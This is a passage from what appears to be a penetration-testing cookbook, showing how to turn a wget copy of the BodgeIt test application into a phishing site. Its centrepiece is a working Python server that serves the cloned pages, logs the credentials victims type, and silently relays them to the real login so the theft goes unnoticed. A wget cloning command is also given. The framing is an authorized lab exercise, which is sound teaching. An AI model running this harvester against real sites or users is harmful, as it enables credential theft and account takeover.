Using previously saved pages to create a phishing site
In the previous recipe, we used SET to duplicate a website and harvest passwords with it. However, duplicating only the login page may not fool more advanced users: they may become suspicious when they type the correct password and are sent back to the login page again, or they may try to follow some other link on the page, and we lose them as soon as they leave our copy for the original site.
In this recipe, we will use the copy of the site we made in the Downloading a page for offline analysis with Wget recipe in Chapter 3, Crawlers and Spiders, to build a more elaborate phishing site: it will offer almost full navigation and will log the user in to the original site once the credentials have been captured.
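To make the capture-and-handover idea concrete before we start, the following is a minimal sketch, not the script used later in this recipe. It assumes the wget copy sits in a directory named bodgeit_offline, that the cloned login form has been edited to post back to this server, and that the genuine BodgeIt VM answers at a placeholder lab address; adjust all of these to your own authorized test environment. It records any credentials posted to the cloned form and then replies with a hidden, auto-submitting form that sends the same credentials to the real login page:

#!/usr/bin/env python3
# Minimal sketch for an authorized lab exercise against the BodgeIt test app.
import html
import urllib.parse
from http.server import HTTPServer, SimpleHTTPRequestHandler

REAL_LOGIN = "http://192.168.56.11/bodgeit/login.jsp"  # hypothetical lab address
LOG_FILE = "captured_credentials.txt"

class PhishingHandler(SimpleHTTPRequestHandler):
    def __init__(self, *args, **kwargs):
        # Serve the static pages that wget downloaded
        super().__init__(*args, directory="bodgeit_offline", **kwargs)

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        fields = urllib.parse.parse_qs(self.rfile.read(length).decode())

        # Record whatever was typed into the cloned login form
        with open(LOG_FILE, "a") as log:
            log.write(f"{self.path} -> {fields}\n")

        # Reply with a hidden form that immediately re-submits the captured
        # credentials to the real application
        inputs = "".join(
            f'<input type="hidden" name="{html.escape(k, quote=True)}" '
            f'value="{html.escape(v[0], quote=True)}">'
            for k, v in fields.items()
        )
        page = ('<html><body onload="document.forms[0].submit()">'
                f'<form method="POST" action="{REAL_LOGIN}">{inputs}</form>'
                '</body></html>')
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(page.encode())

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8000), PhishingHandler).serve_forever()

The auto-submitted form is what makes the handover transparent: the victim's browser performs the real login itself, so it receives a valid session cookie from the original server and continues browsing there as if nothing had happened.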
Getting ready
We need a saved copy of the target site, made by following the Downloading a page for offline analysis with Wget recipe in Chapter 3, Crawlers and Spiders. In short, this can be done with the following command:
wget -r -P bodgeit_offline...
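As an illustration, a full invocation might look like the following, where bodgeit_offline is the directory the copy is saved to (-P) and the URL is a placeholder for the address of the vulnerable BodgeIt VM in your own lab:

wget -r -P bodgeit_offline http://192.168.56.11/bodgeit/

The -r option makes wget follow links recursively, so we get the application's other pages and resources rather than only the login form.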